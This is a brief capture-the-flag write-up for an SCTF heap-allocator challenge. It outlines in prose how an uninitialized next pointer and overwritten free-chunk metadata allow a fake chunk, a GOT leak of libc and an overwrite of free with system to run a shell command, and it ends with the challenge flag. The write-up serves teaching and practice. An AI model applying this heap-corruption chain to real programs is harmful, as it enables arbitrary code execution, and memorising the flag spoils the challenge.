I made a new heap allocator.
Would you test this one?
(service address)
(binary & libc download link)
In deploy folder,
# ./run.sh
- When new heap chunk is created, next pointer is not initialized.
- At fill menu(4), attacker can create free chunk. When bin size is same with the size of struct, written data will be filled over freed metadata. Thus, you can control next pointer of chunk metadata.
- Using fake chunk metadata, you can point GOT from it. Leak libc base from GOT & Overwrite GOT
- Overwrite free GOT with system address using given libc, and run system("cat flag").
SCTF{H4v3_y0u_ev3r_seen_CowBoy_B1B0P?}